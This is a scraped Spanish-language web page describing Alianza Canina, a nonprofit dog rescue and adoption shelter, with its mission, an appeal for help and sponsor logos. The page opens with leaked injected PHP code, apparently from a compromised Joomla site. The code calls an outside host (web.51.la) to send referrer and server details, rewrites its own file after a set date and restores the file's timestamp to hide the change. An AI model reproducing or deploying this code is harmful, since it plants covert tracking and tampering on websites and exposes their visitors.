check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Alianza Canina

UniversoPyme

universopyme

Inscripción a boletín electrónico











Alianza Canina PDF Imprimir E-mail

¿QUIÉNES SOMOS?

Alianza Canina es una asociación sin fines de lucro. Somos un grupo de personas amantes de los animales, que nos unimos para lograr reunir a los perros extraviados en nuestra comunidad con sus dueños o buscar un hogar para los perros abandonados.

Mantenemos a los perros en un lugar adecuado para su bienestar. El plazo de permanencia de los animales en el refugio es indefinido. Puedes ponerte en contacto con nosotros si deseas adoptar o realizar algún donativo para el mantenimiento de nuestros perros. Si los animales no son adoptados permanecen en el refugio recibiendo los cuidados y atenciones de los voluntarios, no nos damos por vencidos hasta encontrar el hogar ideal para estos perritos. 

 

La población de perros perdidos y abandonados en ocasiones rebasa nuestra capacidad de albergue, por lo tanto, si encuentras un perrito te pedimos que te comuniques a los contactos de Alianza Canina, para confirmar que haya lugar disponible para éste, de no ser así, buscaríamos un hogar temporal (puedes ser tú) en lo que se libera un espacio en el albergue. Ayúdanos en esta ardua labor. El altruismo no se delega.

 

Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete0_cerocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus